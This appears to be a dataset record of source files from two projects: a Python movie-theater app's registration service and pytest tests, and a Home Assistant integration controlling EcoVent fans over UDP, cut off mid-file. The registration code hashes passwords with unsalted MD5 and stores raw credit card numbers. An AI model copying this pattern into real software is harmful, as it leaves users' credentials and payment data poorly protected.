metadata (dict) | text (string, 60 to 3.49M characters)
{
"source": "49ers-DB/Atlanta-Movie",
"score": 3
} |
#### File: app/services/RegisterService.py
```python
from app.services.DBService import get_conn
class RegisterService(object):
def registerUser(self, user) -> bool:
username = user['username']
firstname = user['firstname']
lastname = user['lastname']
password = user['password']
connection = get_conn()
with connection.cursor() as cursor:
#Checking for duplicates
sql = "SELECT `username` FROM `User` where username=(%s)"
cursor.execute(sql, (username,))
userDatas = cursor.fetchall()
connection.commit()
success = False
if len(userDatas) < 1:
#Inserting the values to User
sql = """INSERT INTO User (username, status, firstname, lastname, password)
VALUES (%s,%s,%s,%s,MD5(%s))"""
dataTuple = (username, 'Pending', firstname, lastname, password)
cursor.execute(sql, dataTuple)
connection.commit()
success = True
connection.close()
return success
def registerCustomer(self, customer) -> tuple:
response = ({'message': 'Credit Card taken'}, 402)
connection = get_conn()
with connection.cursor() as cursor:
credit_card_list = customer['creditCardsList']
if len(credit_card_list) > 5:
return ({'message': 'Too Many Credit Cards'}, 402)
for i in range(5 - len(credit_card_list)):
credit_card_list.append(None)
credit_card_list = tuple(credit_card_list)
sql = """SELECT count(`creditCardNum`) FROM `CustomerCreditCard`
where creditCardNum in (%s, %s, %s, %s, %s)"""
cursor.execute(sql, credit_card_list)
dup_count = cursor.fetchall()
connection.commit()
if dup_count[0].get(('count(`creditCardNum`)')) > 0:
return ({'message': 'Credit Card taken'}, 402)
response = ({'message': 'Username Taken'}, 402)
if self.registerUser(customer):
#Inserting the values to Customer
sql = """INSERT INTO Customer (username)
VALUES (%s)"""
dataTuple = (customer['username'],)
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to CustomerCreditCard
creditCards = customer['creditCardsList']
for creditCard in creditCards:
if creditCard is not None:
sql = """INSERT INTO CustomerCreditCard (username, creditCardNum)
VALUES (%s, %s)"""
dataTuple = (customer['username'], creditCard)
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': customer}, 200)
connection.close()
return response
def registerManager(self, manager) -> tuple:
connection = get_conn()
with connection.cursor() as cursor:
if manager['selectedState']['value'] == "ALL":
return ({'message':'State Cannot be ALL'}, 400)
address = (manager['address'], manager['city'], manager['selectedState']['value'], manager['zipCode'])
sql = "SELECT `username` FROM `Manager` WHERE manStreet=(%s) AND manCity=(%s) AND manState=(%s) AND manZipCode=(%s)"
cursor.execute(sql, address)
userDatas = cursor.fetchall()
connection.commit()
if len(userDatas) < 1:
response = ({'message':'Username already taken'}, 400)
if self.registerUser(manager):
#Inserting the values to Employee
sql = """INSERT INTO Employee (username)
VALUES (%s)"""
dataTuple = (manager['username'],)
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to Manager
sql = """INSERT INTO Manager (username, manStreet, manCity, manState, manZipCode, comName)
VALUES (%s, %s, %s, %s, %s, %s)"""
dataTuple = (manager['username'], manager['address'], manager['city'], manager['selectedState']['value'], manager['zipCode'], manager['selectedCompany']['value'])
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': manager}, 200)
else:
response = ({'message':'Address already taken'}, 400)
connection.close()
return response
def registerManagerCustomer(self, managerCustomer) -> tuple:
connection = get_conn()
with connection.cursor() as cursor:
if managerCustomer['selectedState']['value'] == "ALL":
return ({'message':'State Cannot be ALL'}, 400)
address = (managerCustomer['address'], managerCustomer['city'], managerCustomer['selectedState']['value'], managerCustomer['zipCode'])
sql = "SELECT `username` FROM `Manager` WHERE manStreet=(%s) AND manCity=(%s) AND manState=(%s) AND manZipCode=(%s)"
cursor.execute(sql, address)
userDatas = cursor.fetchall()
connection.commit()
if len(userDatas) < 1 :
response = ({'message':'Username already taken'}, 400)
if self.registerCustomer(managerCustomer)[1] == 200:
#Inserting the values to Employee
sql = """INSERT INTO Employee (username)
VALUES (%s)"""
dataTuple = (managerCustomer['username'],)
cursor.execute(sql, dataTuple)
connection.commit()
#Inserting the values to Manager
sql = """INSERT INTO Manager (username, manStreet, manCity, manState, manZipCode, comName)
VALUES (%s, %s, %s, %s, %s, %s)"""
dataTuple = (managerCustomer['username'], managerCustomer['address'], managerCustomer['city'], managerCustomer['selectedState']['value'], managerCustomer['zipCode'], managerCustomer['selectedCompany']['value'])
cursor.execute(sql, dataTuple)
connection.commit()
response = ({'ok': True, 'data': managerCustomer}, 200)
else:
response = ({'message':'Address already taken'}, 400)
connection.close()
return response
```
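For context, a minimal driver for the service above; this is only a sketch and assumes the Atlanta-Movie `app` package is importable and that `DBService.get_conn()` can reach a configured MySQL instance (the payload values are made up):
```python
# Hypothetical usage sketch for RegisterService; assumes the Atlanta-Movie app
# package is on sys.path and DBService.get_conn() reaches a configured MySQL DB.
from app.services.RegisterService import RegisterService

service = RegisterService()
new_customer = {
    'username': 'moviefan42',            # illustrative values, not from the repo
    'firstname': 'Ada',
    'lastname': 'Lovelace',
    'password': 'not-a-real-password',
    'creditCardsList': ['4111111111111111'],
}
body, status = service.registerCustomer(new_customer)
print(status, body)  # 200 with {'ok': True, ...} on success, 402 with a message otherwise
```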
#### File: Atlanta-Movie/test/test_ManagerService.py
```python
import pytest
import functools
import datetime
import pymysql
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from app.services.DBService import get_conn
from app.services.ManagerService import ManagerService
class TestManagerService(object):
def test_TheaterOverview_NoFilters(self):
TOTestDict = {}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"Ge<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_MinReleaseDate(self):
TOTestDict = {'i_minReleaseDate':datetime.date(2010,11,26)}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
expected =[
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130}]
print(Actual)
assert len(expected) == len(Actual)
assert sorted(expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_ReleaseDate(self):
TOTestDict = {'i_minReleaseDate':datetime.date(1985,8,13),
'i_maxReleaseDate':datetime.date(2010,11,26)
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_PlayDate(self):
TOTestDict = {'i_minPlayDate':datetime.date(2019,3, 19),
'i_maxPlayDate':datetime.date(2019, 11, 12)
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
TOTestDict = {'i_minPlayDate':datetime.date(2019,3, 19),
'i_maxPlayDate':datetime.date(2019, 3, 19)
}
Actual = manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_maxDurFilter(self):
TOTestDict = {
"i_maxDuration": 100
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME> Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_durFilters(self):
TOTestDict = {
"i_maxDuration": 100,
"i_minDuration": 96
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME> Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_include_false(self):
TOTestDict = {
"i_notplayed": False
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected =[
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"Ge<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':datetime.date(2019,10,12),'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':datetime.date(2018,7,19),'Duration':75},
{'Movie':'Georgia Tech The Movie','Release_Date':datetime.date(1985,8,13),'Play_Date':datetime.date(1985,8,13),'Duration':100}]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_TheaterOverview_include_True(self):
TOTestDict = {
"i_notplayed": True
}
manager_service = ManagerService()
Actual= manager_service.TheaterOverview('imbatman',TOTestDict)
Expected = [
{'Movie':"How to Train Your Dragon",'Release_Date':datetime.date(2010, 3,21),'Play_Date':None,'Duration':98},
{'Movie':"4400 The Movie",'Release_Date':datetime.date(2019,8,12),'Play_Date':None,'Duration':130},
{'Movie':"The First Pokemon Movie",'Release_Date':datetime.date(1998,7,19),'Play_Date':None,'Duration':75},
{'Movie':"The King's Speech",'Release_Date':datetime.date(2010,11,26),'Play_Date':None,'Duration':119},
{'Movie':"Avengers: Endgame",'Release_Date':datetime.date(2019,4,26),'Play_Date':None,'Duration':181},
{'Movie':'Spaceballs','Release_Date':datetime.date(1987,6,24),'Play_Date':None,'Duration':96},
{'Movie':"Spider-Man: Into the Spider-Verse",'Release_Date':datetime.date(2018,12,1),'Play_Date':None,'Duration':117},
{'Movie':"Georgia Tech The Movie",'Release_Date':datetime.date(1985,8,13),'Play_Date':None,'Duration':100},
{'Movie':"<NAME>'s Life Story",'Release_Date':datetime.date(1927,8,12),'Play_Date':None,'Duration':100},
{'Movie':"Calculus Returns: A ML Story",'Release_Date':datetime.date(2019,9,19),'Play_Date':None,'Duration':314},
]
print(Actual)
assert len(Expected) == len(Actual)
assert sorted(Expected, key=functools.cmp_to_key(compare_movie)) == sorted(Actual, key=functools.cmp_to_key(compare_movie))
def test_Schedule_Movie(self):
filterz = {'i_movName':'Spaceballs','i_movReleaseDate':datetime.date(1987,6,24),'i_movPlayDate':datetime.date(2030,6,24)}
connection = get_conn()
with connection.cursor() as cursor:
sql_del = """delete From MoviePlay where movPlayDate = '2030-06-24'"""
cursor.execute(sql_del)
connection.commit()
manager_service = ManagerService()
manager_service.ScheduleMovie('imbatman',filterz)
cursor.execute("select * from MoviePlay where movPlayDate = '2030-06-24'")
data=cursor.fetchall()
connection.commit()
sql_del = """delete From MoviePlay where movPlayDate = '2030-06-24'"""
cursor.execute(sql_del)
connection.commit()
connection.close()
assert len(data)==1
def compare_movie(item1, item2):
if item1['Movie'] < item2['Movie']:
return -1
elif item1['Movie'] > item2['Movie']:
return 1
else:
return compare_play_date(item1, item2)
def compare_play_date(item1, item2):
if item1['Play_Date'] is None and item2['Play_Date'] is None:
return 0
elif item1['Play_Date'] is None:
return 1
elif item2['Play_Date'] is None:
return -1
if item1['Play_Date'] < item2['Play_Date']:
return -1
elif item1['Play_Date'] > item2['Play_Date']:
return 1
else:
return 0
``` |
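The assertions in these tests compare result sets order-insensitively by sorting both sides with the same comparator through `functools.cmp_to_key`. A standalone sketch of that pattern, with illustrative rows rather than database output:
```python
# Order-insensitive comparison of two lists of dicts, mirroring the tests above.
import functools

def compare_rows(a, b):
    # order rows by the 'Movie' field only (illustrative comparator)
    if a['Movie'] != b['Movie']:
        return -1 if a['Movie'] < b['Movie'] else 1
    return 0

left = [{'Movie': 'Spaceballs'}, {'Movie': '4400 The Movie'}]
right = [{'Movie': '4400 The Movie'}, {'Movie': 'Spaceballs'}]
key = functools.cmp_to_key(compare_rows)
assert sorted(left, key=key) == sorted(right, key=key)
print("same rows, regardless of order")
```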
{
"source": "49jan/hass-ecovent",
"score": 2
} |
#### File: custom_components/ecovent/fan.py
```python
from __future__ import annotations
import asyncio
from email.policy import default
import logging
import ipaddress
import time
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.fan import (
ATTR_PERCENTAGE,
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
FanEntity,
FanEntityFeature,
)
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_ENTITY_ID,
CONF_IP_ADDRESS,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
)
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv, entity_platform
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.helpers.event import async_track_state_change_event
from .const import (
MY_DOMAIN,
CONF_DEFAULT_DEVICE_ID,
CONF_DEFAULT_NAME,
CONF_DEFAULT_PASSWORD,
CONF_DEFAULT_PORT,
ATTR_AIRFLOW,
ATTR_AIRFLOW_MODES,
ATTR_FILTER_REPLACEMENT_STATUS,
ATTR_FILTER_TIMER_COUNTDOWN,
ATTR_HUMIDITY,
ATTR_HUMIDITY_SENSOR_STATUS,
ATTR_HUMIDITY_SENSOR_TRESHOLD,
ATTR_MACHINE_HOURS,
PRESET_MODE_ON,
SERVICE_CLEAR_FILTER_REMINDER,
SERVICE_SET_AIRFLOW,
SERVICE_HUMIDITY_SENSOR_TURN_ON,
SERVICE_HUMIDITY_SENSOR_TURN_OFF,
SERVICE_SET_HUMIDITY_SENSOR_TRESHOLD_PERCENTAGE,
)
LOG = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=CONF_DEFAULT_NAME): cv.string,
vol.Optional(CONF_DEVICE_ID, default=CONF_DEFAULT_DEVICE_ID): cv.string,
vol.Required(CONF_IP_ADDRESS): vol.All(ipaddress.ip_address, cv.string),
vol.Optional(CONF_PORT, default=CONF_DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default=CONF_DEFAULT_PASSWORD): cv.string,
}
)
# pylint: disable=unused-argument
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Initialize the EcoVent fans from config."""
name = config.get(CONF_NAME)
device_id = config.get(CONF_DEVICE_ID)
device_ip_address = config.get(CONF_IP_ADDRESS)
device_port = config.get(CONF_PORT)
device_pass = config.get(CONF_PASSWORD)
fan = EcoVentFan(
hass, config, device_ip_address, device_pass, device_id, name, device_port
)
async_add_entities([fan], update_before_add=True)
# expose service call APIs
# component = EntityComponent(LOG, MY_DOMAIN, hass)
component = entity_platform.async_get_current_platform()
component.async_register_entity_service(
SERVICE_SET_AIRFLOW,
{vol.Required(ATTR_AIRFLOW): cv.string},
"async_set_airflow",
)
component.async_register_entity_service(
SERVICE_HUMIDITY_SENSOR_TURN_ON,
{},
"async_humidity_sensor_turn_on",
)
component.async_register_entity_service(
SERVICE_HUMIDITY_SENSOR_TURN_OFF,
{},
"async_humidity_sensor_turn_off",
)
component.async_register_entity_service(
SERVICE_SET_HUMIDITY_SENSOR_TRESHOLD_PERCENTAGE,
{
vol.Required(ATTR_PERCENTAGE): vol.All(
vol.Coerce(int), vol.Range(min=0, max=100)
)
},
"async_set_humidity_sensor_treshold_percentage",
)
component.async_register_entity_service(
SERVICE_CLEAR_FILTER_REMINDER, {}, "async_clear_filter_reminder"
)
return True
"""Library to handle communication with Wifi ecofan from TwinFresh / Blauberg"""
import socket
import sys
import time
import math
from typing import Any
class EcoVentFan(FanEntity):
"""Class to communicate with the ecofan"""
HEADER = f"FDFD"
func = {
"read": "01",
"write": "02",
"write_return": "03",
"inc": "04",
"dec": "05",
"resp": "06",
}
states = {0: "off", 1: "on", 2: "togle"}
speeds = {
0: "standby",
1: "low",
2: "medium",
3: "high",
0xFF: "manual",
}
timer_modes = {0: "off", 1: "night", 2: "party"}
statuses = {0: "off", 1: "on"}
airflows = {0: "ventilation", 1: "heat_recovery", 2: "air_supply"}
alarms = {0: "no", 1: "alarm", 2: "warning"}
days_of_week = {
0: "all days",
1: "Monday",
2: "Tuesday",
3: "Wednesday",
4: "Thursday",
5: "Friday",
6: "Saturday",
7: "Sunday",
8: "Mon-Fri",
9: "Sat-Sun",
}
filters = {0: "filter replacement not required", 1: "replace filter"}
unit_types = {
0x0300: "Vento Expert A50-1/A85-1/A100-1 W V.2",
0x0400: "Vento Expert Duo A30-1 W V.2",
0x0500: "Vento Expert A30 W V.2",
}
wifi_operation_modes = {1: "client", 2: "ap"}
wifi_enc_types = {48: "Open", 50: "wpa-psk", 51: "wpa2_psk", 52: "wpa_wpa2_psk"}
wifi_dhcps = {0: "STATIC", 1: "DHCP", 2: "Invert"}
params = {
0x0001: ["state", states],
0x0002: ["speed", speeds],
0x0006: ["boost_status", statuses],
0x0007: ["timer_mode", timer_modes],
0x000B: ["timer_counter", None],
0x000F: ["humidity_sensor_state", states],
0x0014: ["relay_sensor_state", states],
0x0016: ["analogV_sensor_state", states],
0x0019: ["humidity_treshold", None],
0x0024: ["battery_voltage", None],
0x0025: ["humidity", None],
0x002D: ["analogV", None],
0x0032: ["relay_status", statuses],
0x0044: ["man_speed", None],
0x004A: ["fan1_speed", None],
0x004B: ["fan2_speed", None],
0x0064: ["filter_timer_countdown", None],
0x0066: ["boost_time", None],
0x006F: ["rtc_time", None],
0x0070: ["rtc_date", None],
0x0072: ["weekly_schedule_state", states],
0x0077: ["weekly_schedule_setup", None],
0x007C: ["device_search", None],
0x007D: ["device_password", None],
0x007E: ["machine_hours", None],
0x0083: ["alarm_status", alarms],
0x0085: ["cloud_server_state", states],
0x0086: ["firmware", None],
0x0088: ["filter_replacement_status", statuses],
0x0094: ["wifi_operation_mode", wifi_operation_modes],
0x0095: ["wifi_name", None],
0x0096: ["wifi_pasword", None],
0x0099: ["wifi_enc_type", wifi_enc_types],
0x009A: ["wifi_freq_chnnel", None],
0x009B: ["wifi_dhcp", wifi_dhcps],
0x009C: ["wifi_assigned_ip", None],
0x009D: ["wifi_assigned_netmask", None],
0x009E: ["wifi_main_gateway", None],
0x00A3: ["curent_wifi_ip", None],
0x00B7: ["airflow", airflows],
0x00B8: ["analogV_treshold", None],
0x00B9: ["unit_type", unit_types],
0x0302: ["night_mode_timer", None],
0x0303: ["party_mode_timer", None],
0x0304: ["humidity_status", statuses],
0x0305: ["analogV_status", statuses],
}
write_only_params = {
0x0065: ["filter_timer_reset", None],
0x0077: ["weekly_schedule_setup", None],
0x0080: ["reset_alarms", None],
0x0087: ["factory_reset", None],
0x00A0: ["wifi_apply_and_quit", None],
0x00A2: ["wifi_discard_and_quit", None],
}
# ========================== HA implementation ==========================
def __init__(
self,
hass,
conf,
host,
password="<PASSWORD>",
fan_id="DEFAULT_DEVICEID",
name="ecofanv2",
port=4000,
):
self.hass = hass
self._name = name
self._host = host
self._port = port
self._type = "02"
self._id = fan_id
self._pwd_size = 0
self._password = password
# HA attribute
self._attr_preset_modes = [PRESET_MODE_ON]
if fan_id == "DEFAULT_DEVICEID":
self.get_param("device_search")
self._id = self.device_search
# Set HA unique_id
self._attr_unique_id = self._id
self.update()
LOG.info(f"Created EcoVent fan controller '{self._host}'")
async def async_added_to_hass(self) -> None:
"""Once entity has been added to HASS, subscribe to state changes."""
await super().async_added_to_hass()
# setup listeners to track changes
async_track_state_change_event(
self.hass,
[
self.state,
self.speed,
self.humidity,
self.airflow,
self.filter_replacement_status,
],
self._state_changed,
)
@callback
def _state_changed(self, event):
"""Whenever state, speed, humidity or airflow change state, the fan speed needs to be updated"""
entity = event.data.get("entity_id")
to_state = event.data["new_state"].state
## sometimes there is no from_state
old_state = event.data.get("old_state")
from_state = old_state.state if old_state else None
if not from_state or to_state != from_state:
LOG.info(
f"{entity} changed from {from_state} to {to_state}, updating '{self._name}'"
)
self.schedule_update_ha_state()
# pylint: disable=arguments-differ
async def async_turn_on(
self,
percentage: int | None = None,
preset_mode: str | None = None,
**kwargs,
) -> None:
"""Turn on the fan."""
if self.state == "off":
if percentage is not None:
if percentage < 2:
percentage = 33 # Set to LOW
await self.async_set_percentage(percentage)
if preset_mode is None:
await self.async_set_preset_mode(PRESET_MODE_ON) # Set to defalut
else:
await self.async_set_preset_mode(preset_mode)
self.turn_on_ventilation()
def turn_on(
self,
percentage: int | None = None,
preset_mode: str | None = None,
**kwargs,
) -> None:
"""Turn on the fan."""
self.async_turn_on(percentage, preset_mode, **kwargs)
async def async_turn_off(self):
"""Turn the entity off."""
if self.state == "on":
self.turn_off_ventilation()
# override orignial entity method
def turn_off(self, **kwargs: Any) -> None:
"""Turn the entity off."""
self.async_turn_off()
def set_preset_mode(self, preset_mode: str) -> None:
LOG.info(f"Set async_set_preset_mode to: {preset_mode}")
self._attr_preset_mode = preset_mode
if preset_mode == PRESET_MODE_ON:
self.turn_on_ventilation()
else:
self.turn_off()
async def async_set_percentage(self, percentage: int) -> None:
LOG.info(f"async_set_percentage: {percentage}")
"""Set the speed of the fan, as a percentage."""
if percentage < 2:
await self.async_turn_off()
else:
self.set_man_speed_percent(percentage)
self.turn_on_ventilation()
async def async_set_airflow(self, airflow: str):
"""Set the airflow of the fan."""
self._airflow = airflow
self.set_airflow(await self.get_airflow_number_by_name(airflow))
async def get_airflow_number_by_name(self, airflow: str):
return list(self.airflows.values()).index(airflow)
async def async_humidity_sensor_turn_on(self):
request = "000F"
value = "01"
if self.humidity_sensor_state == "off":
self.do_func(self.func["write_return"], request, value)
async def async_humidity_sensor_turn_off(self):
request = "000F"
value = "00"
if self.humidity_sensor_state == "on":
self.do_func(self.func["write_return"], request, value)
async def async_set_humidity_sensor_treshold_percentage(self, percentage: int):
if percentage >= 40 and percentage <= 80:
request = "0019"
value = hex(percentage).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
# DO WE NEED IT? self.humidity_treshold = percentage
async def async_clear_filter_reminder(self):
# !!!! NOT TESTED YET !!!!!
if self.filter_replacement_status == "on":
request = "0065"
self.do_func(self.func["write"], request)
async def async_set_direction(self, direction: str):
"""Set the direction of the fan."""
raise NotImplementedError(f"Use {SERVICE_SET_AIRFLOW} service.")
async def async_oscillate(self, oscillating: bool):
"""Oscillate the fan."""
raise NotImplementedError(f"The fan does not support oscillations.")
@property
def extra_state_attributes(self):
"""Return optional state attributes."""
data: dict[str, float | str | None] = self.state_attributes
data[ATTR_AIRFLOW_MODES] = self.airflows
data["device_id"] = self.id
data[ATTR_AIRFLOW] = self.airflow
data[ATTR_HUMIDITY] = self.humidity
data[ATTR_HUMIDITY_SENSOR_STATUS] = self.humidity_status
data[ATTR_HUMIDITY_SENSOR_TRESHOLD] = self.humidity_treshold
# data["night_mode_timer"] = self.night_mode_timer
data[ATTR_FILTER_REPLACEMENT_STATUS] = self.filter_replacement_status
data[ATTR_FILTER_TIMER_COUNTDOWN] = self.filter_timer_countdown
data[ATTR_MACHINE_HOURS] = self.machine_hours
return data
@property
def supported_features(self) -> int:
return FanEntityFeature.SET_SPEED | FanEntityFeature.PRESET_MODE
# ========================== HA implementation ==========================
def connect(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.settimeout(4)
self.socket.connect((self._host, self._port))
return self.socket
def str2hex(self, str_msg):
